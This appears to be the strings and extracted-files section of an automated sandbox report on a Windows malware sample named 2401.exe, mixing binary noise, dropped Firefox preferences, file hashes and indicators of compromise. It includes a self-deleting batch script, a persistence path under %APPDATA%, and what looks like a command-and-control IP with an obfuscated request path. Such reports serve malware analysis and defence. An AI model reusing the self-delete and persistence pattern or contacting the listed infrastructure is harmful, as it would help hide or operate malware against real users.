user_pref("browser.uiCustomization.state", "{\"placements\":{\"PanelUI-contents\":[\"edit-controls\",\"zoom-controls\",\"new-window-button\",\"privatebrowsing-button\",\"save-page-button\",\"print-button\",\"history-panelmenu\",\"fullscreen-button\",\"find-button\",\"preferences-button\",\"add-ons-button\",\"developer-button\"],\"addon-bar\":[\"addonbar-closebutton\",\"status-bar\"],\"PersonalToolbar\":[\"personal-bookmarks\"],\"nav-bar\":[\"urlbar-container\",\"search-container\",\"bookmarks-menu-button\",\"downloads-button\",\"home-button\",\"loop-button-throttled\"],\"TabsToolbar\":[\"tabbrowser-tabs\",\"new-tab-button\",\"alltabs-button\"],\"toolbar-menubar\":[\"menubar-items\"]},\"seen\":[],\"dirtyAreaCache\":[\"PersonalToolbar\",\"nav-bar\",\"TabsToolbar\",\"toolbar-menubar\"],\"currentVersion\":3,\"newElementCount\":0}");

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.healthreport.currentDaySubmissionFailureCount", 1);

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.healthreport.lastDataSubmissionFailureTime", "1461273464441");

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.healthreport.lastDataSubmissionRequestedTime", "1461273462087");

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.healthreport.nextDataSubmissionTime", "1461274364442");

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.healthreport.service.firstRun", true);

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.policy.dataSubmissionPolicyAcceptedVersion", 2);

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.policy.dataSubmissionPolicyNotifiedTime", "1460755731046");

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.policy.firstRunTime", "1460755684396");

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.sessions.current.activeTicks", 14);

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.sessions.current.clean", true);

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.sessions.current.firstPaint", 2002);

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.sessions.current.main", 423);

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.sessions.current.sessionRestored", 2575);

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.sessions.current.startTime", "1461273395766");

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.sessions.current.totalTime", 78);

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.sessions.currentIndex", 6);

Ansi based on Dropped File (prefs.js)

user_pref("datareporting.sessions.prunedIndex", 5);

Ansi based on Dropped File (prefs.js)

user_pref("dom.mozApps.used", true);

Ansi based on Dropped File (prefs.js)

user_pref("extensions.blocklist.pingCountVersion", 0);

Ansi based on Dropped File (prefs.js)

user_pref("extensions.bootstrappedAddons", "{}");

Ansi based on Dropped File (prefs.js)

user_pref("extensions.databaseSchema", 16);

Ansi based on Dropped File (prefs.js)

user_pref("extensions.enabledAddons", "%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:35.0.1");

Ansi based on Dropped File (prefs.js)

user_pref("extensions.getAddons.databaseSchema", 5);

Ansi based on Dropped File (prefs.js)

user_pref("extensions.lastAppVersion", "35.0.1");

Ansi based on Dropped File (prefs.js)

user_pref("extensions.lastPlatformVersion", "35.0.1");

Ansi based on Dropped File (prefs.js)

user_pref("extensions.pendingOperations", false);

Ansi based on Dropped File (prefs.js)

user_pref("extensions.shownSelectionUI", true);

Ansi based on Dropped File (prefs.js)

user_pref("extensions.xpiState", "{\"app-global\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"d\":\"C:\\\\Program Files\\\\Mozilla Firefox\\\\browser\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"e\":true,\"v\":\"35.0.1\",\"st\":1424004302312,\"mt\":1421999039000}}}");

Ansi based on Dropped File (prefs.js)

user_pref("gecko.buildID", "20150122214805");

Ansi based on Dropped File (prefs.js)

user_pref("gecko.mstone", "35.0.1");

Ansi based on Dropped File (prefs.js)

user_pref("loop.soft_start_ticket_number", 10331766);

Ansi based on Dropped File (prefs.js)

user_pref("loop.throttled2", false);

Ansi based on Dropped File (prefs.js)

user_pref("network.cookie.prefsMigrated", true);

Ansi based on Dropped File (prefs.js)

user_pref("network.http.spdy.enabled", false);

Ansi based on Dropped File (prefs.js)

user_pref("pdfjs.migrationVersion", 2);

Ansi based on Dropped File (prefs.js)

user_pref("pdfjs.previousHandler.alwaysAskBeforeHandling", true);

Ansi based on Dropped File (prefs.js)

user_pref("pdfjs.previousHandler.preferredAction", 4);

Ansi based on Dropped File (prefs.js)

user_pref("places.database.lastMaintenance", 1461273463);

Ansi based on Dropped File (prefs.js)

user_pref("places.history.expiration.transient_current_max_pages", 53676);

Ansi based on Dropped File (prefs.js)

user_pref("plugin.disable_full_page_plugin_for_types", "application/pdf");

Ansi based on Dropped File (prefs.js)

user_pref("plugin.importedState", true);

Ansi based on Dropped File (prefs.js)

user_pref("privacy.sanitize.migrateFx3Prefs", true);

Ansi based on Dropped File (prefs.js)

user_pref("signon.importedFromSqlite", true);

Ansi based on Dropped File (prefs.js)

user_pref("toolkit.startup.last_success", 1461273396);

Ansi based on Dropped File (prefs.js)

user_pref("toolkit.telemetry.previousBuildID", "20150122214805");

Ansi based on Dropped File (prefs.js)

UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data. Description:

Unicode based on Memory/File Scan (2401.exe.bin)

UTWN,P6H(!

Ansi based on Memory/File Scan (2401.exe.bin)

VI@!VI@'sha

Ansi based on Memory/File Scan (2401.exe.bin)

VI@!VI@VVI@!VI@

Ansi based on Memory/File Scan (2401.exe.bin)

VI@#VI@WVI@#VI@

Ansi based on Memory/File Scan (2401.exe.bin)

VI@$VI@

Ansi based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

VI@$VI@'vle

Ansi based on Memory/File Scan (2401.exe.bin)

VI@$VI@YVI@$VI@

Ansi based on Memory/File Scan (2401.exe.bin)

VI@&VI@ZVI@&VI@

Ansi based on Memory/File Scan (2401.exe.bin)

VI@KVI@

Ansi based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

VI@YVI@

Ansi based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

VS_VERSION_INFO

Unicode based on Memory/File Scan (2401.exe.bin)

Western European (ISO)

Unicode based on Memory/File Scan (2401.exe.bin)

Western European (Windows)"GetCoding must be overridden in %s

Unicode based on Memory/File Scan (2401.exe.bin)

WINHTTP.dll

Ansi based on Memory/File Scan (2401.exe.bin)

WinStationQueryInformationW

Ansi based on Memory/File Scan (2401.exe.bin)

wwpffffff`wwwwwttGwwwwwttGp

Ansi based on Memory/File Scan (2401.exe.bin)

wwwpwwwwwwwwwwpwww

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwDwwwwwwwDwp

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwp

Ansi based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

wwwwwww

Ansi based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

wwwwwwwwp

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwww

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwww(

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwwww

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwwwwwp

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwwwwww

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwwwwwwp

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwwwwwwwwwwwww(

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwwwwwwwwwwwwwwwwwwwwp

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwp

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwwwwwwwwx

Ansi based on Memory/File Scan (2401.exe.bin)

wwwwwwwwwwwwx

Ansi based on Memory/File Scan (2401.exe.bin)

wwwxwwww

Ansi based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

{00020430-0000-0000-C000-000000000046}

Unicode based on Memory/File Scan (2401.exe.bin)

{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}

Unicode based on Runtime Data (2401.exe)

{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Unicode based on Runtime Data (2401.exe)

{7DCCB1DC-B823-B713-AA01-6CDB7EC5603F}

Unicode based on Runtime Data (explorer.exe)

{92F219DF-C970-94C3-E3E6-0D08C77A91BC}

Unicode based on Runtime Data (explorer.exe)

{G#-9\XWo

Ansi based on Memory/File Scan (2401.exe.bin)

~;&}G!XI.

Ansi based on Memory/File Scan (2401.exe.bin)

~a{%~a{%~a{%~a{%

Ansi based on Hybrid Analysis (2401.exe, 00018221-00002356.00000002.24716.00401000.00000020.mdmp)

!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

Ansi based on Memory/File Scan (2401.exe.bin)

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~

Ansi based on Memory/File Scan (2401.exe.bin)

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

Ansi based on Memory/File Scan (2401.exe.bin)

!This program cannot be run in DOS mode.$

Ansi based on Memory/File Scan (2401.exe.bin)

"B <1=

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.0041A000.00000002.mdmp)

"C:\2401.exe"

Ansi based on Process Commandline (adprtext.exe)

"w1}H

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

# Mozilla User Preferences

Ansi based on Dropped File (prefs.js)

#.X'=

Ansi based on Memory/File Scan (2401.exe.bin)

%'%s'

Unicode based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

%1, %2. Block size: %3.[Detected that journal is located on separate volume. Results may not contain deleted files.

Unicode based on Memory/File Scan (2401.exe.bin)

%d, %d

Ansi based on Hybrid Analysis (2401.exe.bin)

%WINDIR%\Explorer.EXE

Ansi based on Process Commandline (explorer.exe)

&%A e1\!(

Ansi based on Memory/File Scan (2401.exe.bin)

'/W'@B9C(

Ansi based on Memory/File Scan (2401.exe.bin)

'N?gn7<B(:Z

Ansi based on Memory/File Scan (2401.exe.bin)

(%s%.4x)

Unicode based on Memory/File Scan (2401.exe.bin)

(%s%.8x)%s.

Unicode based on Memory/File Scan (2401.exe.bin)

(%s)

Unicode based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

('%s' is not a valid floating point value

Unicode based on Memory/File Scan (2401.exe.bin)

((((( H

Unicode based on Memory/File Scan (2401.exe.bin)

(null)

Unicode based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.0041A000.00000002.mdmp)

(q0a;t

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

)sj86

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

)~M;^G,/+

Ansi based on Memory/File Scan (2401.exe.bin)

* If you make changes to this file while the application is running,

Ansi based on Dropped File (prefs.js)

* the changes will be overwritten when the application exits.

Ansi based on Dropped File (prefs.js)

* To make a manual change to preferences, you can visit the URL about:config

Ansi based on Dropped File (prefs.js)

+_Ywyqcb3

Ansi based on Memory/File Scan (2401.exe.bin)

+lr07jQ^

Ansi based on Memory/File Scan (2401.exe.bin)

,&pyw

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

,eq4q

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

.?AVbad_alloc@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVbad_exception@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVexception@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVlength_error@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVlogic_error@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVout_of_range@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVtype_info@@

Ansi based on Memory/File Scan (2401.exe.bin)

.rsrc

Ansi based on Memory/File Scan (2401.exe.bin)

.text

Ansi based on Memory/File Scan (2401.exe.bin)

.Unexpected variant or safe array error: %s%.8x,

Unicode based on Memory/File Scan (2401.exe.bin)

Ansi based on Runtime Data (explorer.exe )

Ansi based on Runtime Data (adprtext.exe )

/* Do not edit this file.

Ansi based on Dropped File (prefs.js)

/images/T5bBOV8l85Qk1/m8Wl9syM/yPg5RYaxlJ8t4CrLMAkdkSy/b0JDQA4Xqq/1aYEyJL_2Fnsujt5c/5mv7Me0nN3_2/BvKyV5_2Bqg/bp9V0946G0tkea/Htr779_2FUYQgiM_2FgOU/pt19z1zdnUczVV5_/2Fyb9bXrj8t/8HEEp3.bmp

Ansi based on PCAP Processing (PCAP)

/PBj+

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

1#IND

Ansi based on Hybrid Analysis (2401.exe.bin)

1#INF

Ansi based on Hybrid Analysis (2401.exe.bin)

1#QNAN

Ansi based on Hybrid Analysis (2401.exe.bin)

1#SNAN

Ansi based on Hybrid Analysis (2401.exe.bin)

2""#33:DC8

Ansi based on Memory/File Scan (2401.exe.bin)

2""333:"C8

Ansi based on Memory/File Scan (2401.exe.bin)

2$B""""C38

Ansi based on Memory/File Scan (2401.exe.bin)

21DB7EA6BC34D3460F

Unicode based on Runtime Data (explorer.exe )

2401.exe

Unicode based on Runtime Data (2401.exe )

25-01-2017 02:45:01

Ansi based on Dropped File (01D276F955CEADB00B)

25-01-2017 02:45:01%WINDIR%\Explorer.EXEAltTab

Ansi based on Dropped File (01D276F955CEADB00B)

28E3.bat

Unicode based on Runtime Data (2401.exe )

2C4"""D338

Ansi based on Memory/File Scan (2401.exe.bin)

2o$jtfk

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

33333

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

333333333333333

Ansi based on Memory/File Scan (2401.exe.bin)

333333333333333333

Ansi based on Memory/File Scan (2401.exe.bin)

333333DDD3

Ansi based on Memory/File Scan (2401.exe.bin)

333DDD33333?

Ansi based on Memory/File Scan (2401.exe.bin)

3D3s

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

417825

Ansi based on Hybrid Analysis (2401.exe , 00018221-00002356.00000002.24716.00401000.00000020.mdmp)

4B%dE

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

5'0H$~"$

Ansi based on Memory/File Scan (2401.exe.bin)

5s3R6=

Ansi based on Memory/File Scan (2401.exe.bin)

600OnKeyPress

Ansi based on Memory/File Scan (2401.exe.bin)

622"9Hf/i

Ansi based on Memory/File Scan (2401.exe.bin)

64_=#

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

6DS5KRPh?

Ansi based on Memory/File Scan (2401.exe.bin)

7.94.8

Unicode based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

77.91.144.64

Ansi based on PCAP Processing (PCAP)

7?Df`+WA^+z

Ansi based on Memory/File Scan (2401.exe.bin)

800OnKeyPress

Ansi based on Memory/File Scan (2401.exe.bin)

9Ijv=_X.

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

9PJ|v

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

:3872611

Ansi based on Dropped File (28E3.bat)

:3872611if not exist %1 goto 4291094684cmd /C "%1 %2"if errorlevel 1 goto 3872611:4291094684del %0

Ansi based on Runtime Data (2401.exe )

:4291094684

Ansi based on Dropped File (28E3.bat)

:5yK:RK8.Ib

Ansi based on Memory/File Scan (2401.exe.bin)

:DC33:""$8

Ansi based on Memory/File Scan (2401.exe.bin)

;L>(.a5A B

Ansi based on Memory/File Scan (2401.exe.bin)

;|HW)l1d0

Ansi based on Memory/File Scan (2401.exe.bin)

<+t(<-t$:

Ansi based on Memory/File Scan (2401.exe.bin)

<.dll

Unicode based on Runtime Data (2401.exe )

<9Rzu]~&_^

Ansi based on Memory/File Scan (2401.exe.bin)

<at9<rt,<wt

Ansi based on Memory/File Scan (2401.exe.bin)

<HjsVRu?n>

Ansi based on Memory/File Scan (2401.exe.bin)

Ansi based on Memory/File Scan (2401.exe.bin)

=99__

Ansi based on Image Processing (screen_0.png)

Ansi based on Runtime Data (explorer.exe )

?4j<=

Ansi based on Memory/File Scan (2401.exe.bin)

?___?_

Ansi based on Image Processing (screen_0.png)

?C;0=

Ansi based on Memory/File Scan (2401.exe.bin)

?Dj0Q:W$=

Ansi based on Memory/File Scan (2401.exe.bin)

@.data

Ansi based on Memory/File Scan (2401.exe.bin)

\Sessions\1\Windows\ApiPort

Unicode based on Runtime Data (2401.exe )

\ThemeApiPort

Unicode based on Runtime Data (2401.exe )

]_yz,^[#(zH

Ansi based on Memory/File Scan (2401.exe.bin)

^*k?NcW1o

Ansi based on Memory/File Scan (2401.exe.bin)

^_`?/

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

^ve>Mgte<K

Ansi based on Memory/File Scan (2401.exe.bin)

^W^i*

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

Ansi based on Runtime Data (explorer.exe )

_?m___q____?v____

Ansi based on Image Processing (screen_0.png)

__'_q,_'i'

Ansi based on Image Processing (screen_0.png)

__based(

Ansi based on Memory/File Scan (2401.exe.bin)

__cdecl

Ansi based on Memory/File Scan (2401.exe.bin)

__clrcall

Ansi based on Memory/File Scan (2401.exe.bin)

__fastcall

Ansi based on Memory/File Scan (2401.exe.bin)

__pascal

Ansi based on Memory/File Scan (2401.exe.bin)

__ptr64

Ansi based on Memory/File Scan (2401.exe.bin)

__restrict

Ansi based on Memory/File Scan (2401.exe.bin)

__stdcall

Ansi based on Memory/File Scan (2401.exe.bin)

__thiscall

Ansi based on Memory/File Scan (2401.exe.bin)

__unaligned

Ansi based on Memory/File Scan (2401.exe.bin)

_a___

Ansi based on Image Processing (screen_0.png)

_AutoScroll

Ansi based on Memory/File Scan (2401.exe.bin)

_cabs

Ansi based on Memory/File Scan (2401.exe.bin)

_hypot

Ansi based on Memory/File Scan (2401.exe.bin)

_logb

Ansi based on Memory/File Scan (2401.exe.bin)

_nextafter

Ansi based on Memory/File Scan (2401.exe.bin)

`.rdata

Ansi based on Memory/File Scan (2401.exe.bin)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (2401.exe )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (2401.exe )

`copy constructor closure'

Ansi based on Memory/File Scan (2401.exe.bin)

`default constructor closure'

Ansi based on Memory/File Scan (2401.exe.bin)

`dS,0&t}@

Ansi based on Memory/File Scan (2401.exe.bin)

`dynamic atexit destructor for '

Ansi based on Memory/File Scan (2401.exe.bin)

`dynamic initializer for '

Ansi based on Memory/File Scan (2401.exe.bin)

`eh vector constructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`eh vector copy constructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`eh vector destructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`eh vector vbase constructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`eh vector vbase copy constructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`h````

Ansi based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.0041A000.00000002.mdmp)

`local static guard'

Ansi based on Memory/File Scan (2401.exe.bin)

`local static thread guard'

Ansi based on Memory/File Scan (2401.exe.bin)

`local vftable constructor closure'

Ansi based on Memory/File Scan (2401.exe.bin)

`local vftable'

Ansi based on Memory/File Scan (2401.exe.bin)

`managed vector constructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`managed vector copy constructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`managed vector destructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`omni callsig'

Ansi based on Memory/File Scan (2401.exe.bin)

`placement delete closure'

Ansi based on Memory/File Scan (2401.exe.bin)

`placement delete[] closure'

Ansi based on Memory/File Scan (2401.exe.bin)

`RTTI

Ansi based on Memory/File Scan (2401.exe.bin)

`scalar deleting destructor'

Ansi based on Memory/File Scan (2401.exe.bin)

`string'

Ansi based on Memory/File Scan (2401.exe.bin)

`TextHeight

Ansi based on Memory/File Scan (2401.exe.bin)

`typeof'

Ansi based on Memory/File Scan (2401.exe.bin)

`udt returning'

Ansi based on Memory/File Scan (2401.exe.bin)

`vbase destructor'

Ansi based on Memory/File Scan (2401.exe.bin)

`vbtable'

Ansi based on Memory/File Scan (2401.exe.bin)

`vcall'

Ansi based on Memory/File Scan (2401.exe.bin)

`vector constructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`vector copy constructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`vector deleting destructor'

Ansi based on Memory/File Scan (2401.exe.bin)

`vector destructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`vector vbase constructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`vector vbase copy constructor iterator'

Ansi based on Memory/File Scan (2401.exe.bin)

`vftable'

Ansi based on Memory/File Scan (2401.exe.bin)

`virtual displacement map'

Ansi based on Memory/File Scan (2401.exe.bin)

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Unicode based on Memory/File Scan (2401.exe.bin)

A3Xd][lna

Ansi based on Memory/File Scan (2401.exe.bin)

ABCDEFGHIJKLMNOPQRSTUVWXYZ

Ansi based on Memory/File Scan (2401.exe.bin)

abcdefghijklmnopqrstuvwxyz

Ansi based on Memory/File Scan (2401.exe.bin)

account{A770D234-3A38-4244-88F4-7A867FDC9959}.oeaccount

Unicode based on Runtime Data (explorer.exe )

Across ReCAPTCHA

Ansi based on Memory/File Scan (2401.exe.bin)

Address already in use. Cannot assign requested address.

Unicode based on Memory/File Scan (2401.exe.bin)

Adobe FireworksO

Ansi based on Memory/File Scan (2401.exe.bin)

adprtext.exe

Unicode based on Runtime Data (adprtext.exe )

Advanced Settings

Ansi based on Memory/File Scan (2401.exe.bin)

ADVAPI32.dll

Ansi based on Memory/File Scan (2401.exe.bin)

AggDimensionsForm

Ansi based on Memory/File Scan (2401.exe.bin)

All shadow copies

Unicode based on Memory/File Scan (2401.exe.bin)

alTopBevelOuter

Ansi based on Memory/File Scan (2401.exe.bin)

AltTab

Ansi based on Dropped File (01D276F955CEADB00B)

AlwaysShowExt

Unicode based on Runtime Data (2401.exe )

Ancestor for '%s' not found

Unicode based on Memory/File Scan (2401.exe.bin)

api-gsvc

Unicode based on Runtime Data (2401.exe )

AppData

Unicode based on Runtime Data (2401.exe )

AppendMenuA

Ansi based on Memory/File Scan (2401.exe.bin)

April

Ansi based on Memory/File Scan (2401.exe.bin)

arFileInfo

Unicode based on Memory/File Scan (2401.exe , 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

atan2

Ansi based on Memory/File Scan (2401.exe.bin)

ATS@xJ,OI}X

Ansi based on Memory/File Scan (2401.exe.bin)

Attributes

Unicode based on Runtime Data (2401.exe )

August

Ansi based on Memory/File Scan (2401.exe.bin)

AutoCheckSelect

Unicode based on Runtime Data (2401.exe )

AutoConfigURL

Unicode based on Runtime Data (explorer.exe )

AutoDetect

Unicode based on Runtime Data (2401.exe )

AutoHintFontStyle

Ansi based on Memory/File Scan (2401.exe.bin)

AutoShowHintAlignment

Ansi based on Memory/File Scan (2401.exe.bin)

AutoSize

Ansi based on Memory/File Scan (2401.exe.bin)

AvayaliveDrilled

Unicode based on Memory/File Scan (2401.exe.bin)

AvayaliveDrilled.exe

Unicode based on Memory/File Scan (2401.exe.bin)

AVIFIL32.dll

Ansi based on Memory/File Scan (2401.exe.bin)

AVIStreamGetFrame

Ansi based on Memory/File Scan (2401.exe.bin)

AVIStreamGetFrameClose

Ansi based on Memory/File Scan (2401.exe.bin)

AVIStreamGetFrameOpen

Ansi based on Memory/File Scan (2401.exe.bin)

bad allocation

Ansi based on Memory/File Scan (2401.exe.bin)

bad exception

Ansi based on Memory/File Scan (2401.exe.bin)

Base Class Array'

Ansi based on Memory/File Scan (2401.exe.bin)

Base Class Descriptor at (

Ansi based on Memory/File Scan (2401.exe.bin)

BC .=

Ansi based on Memory/File Scan (2401.exe.bin)

BeginPaint

Ansi based on Memory/File Scan (2401.exe.bin)

Beth Mintel disallows Refresh COLUMNPROPERTY

Ansi based on Memory/File Scan (2401.exe.bin)

BevelKind

Ansi based on Memory/File Scan (2401.exe.bin)

Bi.-kc2(Z

Ansi based on Memory/File Scan (2401.exe.bin)

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Unicode based on Memory/File Scan (2401.exe.bin)

BlurColor

Ansi based on Memory/File Scan (2401.exe.bin)

bogged communicated objective blind paste

Ansi based on Memory/File Scan (2401.exe.bin)

BorderColor

Ansi based on Memory/File Scan (2401.exe.bin)

BorderStyle

Ansi based on Memory/File Scan (2401.exe.bin)

BrowseInPlace

Unicode based on Runtime Data (2401.exe )

Brush.Style

Ansi based on Memory/File Scan (2401.exe.bin)

bsBottomLine

Ansi based on Memory/File Scan (2401.exe.bin)

bsClearPen.Color

Ansi based on Memory/File Scan (2401.exe.bin)

bsNormalShowAccelChar

Ansi based on Memory/File Scan (2401.exe.bin)

btAnchor1Click

Ansi based on Memory/File Scan (2401.exe.bin)

btCancelClick

Ansi based on Memory/File Scan (2401.exe.bin)

btCloseClick

Ansi based on Memory/File Scan (2401.exe.bin)

btnCancelClick

Ansi based on Memory/File Scan (2401.exe.bin)

btnokClick

Ansi based on Memory/File Scan (2401.exe.bin)

BtnSplit.Bottom

Ansi based on Memory/File Scan (2401.exe.bin)

BtnSplit.Left

Ansi based on Memory/File Scan (2401.exe.bin)

BtnSplit.Right

Ansi based on Memory/File Scan (2401.exe.bin)

BtnSplit.Top

Ansi based on Memory/File Scan (2401.exe.bin)

BtnStateCount

Ansi based on Memory/File Scan (2401.exe.bin)

BtnStatus

Ansi based on Memory/File Scan (2401.exe.bin)

BuXg@XT]G

Ansi based on Memory/File Scan (2401.exe.bin)

C:\2401.exe

Ansi based on Hybrid Analysis (2401.exe , 00018221-00002356.00000002.24716.00401000.00000020.mdmp)

C:\Ensoniq\pots\Infrastructures\TB.pdb

Ansi based on Memory/File Scan (2401.exe.bin)

%APPDATA%\cmdisvc6\adprtext.exe

Unicode based on Runtime Data (2401.exe )

Cache

Unicode based on Runtime Data (2401.exe )

CallForAttributes

Unicode based on Runtime Data (2401.exe )

CanMoveAny

Ansi based on Memory/File Scan (2401.exe.bin)

Cannot assign a %s to a %s

Unicode based on Memory/File Scan (2401.exe.bin)

Cannot create file "%s". %s

Unicode based on Memory/File Scan (2401.exe.bin)

Canvas does not allow drawing

Unicode based on Memory/File Scan (2401.exe.bin)

CaptionFont.Charset

Ansi based on Memory/File Scan (2401.exe.bin)

CaptionFont.Color

Ansi based on Memory/File Scan (2401.exe.bin)

CaptionFont.Height

Ansi based on Memory/File Scan (2401.exe.bin)

CaptionFont.Name

Ansi based on Memory/File Scan (2401.exe.bin)

CaptionFont.Style

Ansi based on Memory/File Scan (2401.exe.bin)

CaptionLeftFix

Ansi based on Memory/File Scan (2401.exe.bin)

CaptionTopFix

Ansi based on Memory/File Scan (2401.exe.bin)

Extracted Files

Informative Selection 1
- adprtext.exe
  
  Download Disabled
  
  Filepath
  %APPDATA%\cmdisvc6\adprtext.exe
  
  Size
  649KiB (664576 bytes)
  
  Type
  PE32 executable (GUI) Intel 80386, for MS Windows
  
  Runtime Process
  2401.exe (PID: 2356)
  
  MD5
  b448453b7f2d7758c6e2b6c0a22b0c6c
  
  SHA1
  a186034886f6b1c2dd837289ead660ba560f518c
  
  SHA256
  f220a966aaffb0bab4956c35d392564993e310211c3b7b9e9834910258dea3da

Informative 5
- 01D276F955CEADB00B
  
  Download Disabled
  
  Filepath
  %APPDATA%\Microsoft\{515F65C1-7C10-AB31-0E15-700F2219A4B3}\01D276F955CEADB00B
  
  Size
  124B (124 bytes)
  
  Type
  Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
  
  Runtime Process
  explorer.exe (PID: 1948)
  
  MD5
  86ad5d18bb046f69c0f4e339066fb553
  
  SHA1
  8269863e2237d1cc78495114481ac7f6c0dd95f6
  
  SHA256
  119e1a27bca925171f187b0121996c7ab6dbf5a62e573aaaf449f6576c251eb1
- prefs.js
  
  Download Disabled
  
  Filepath
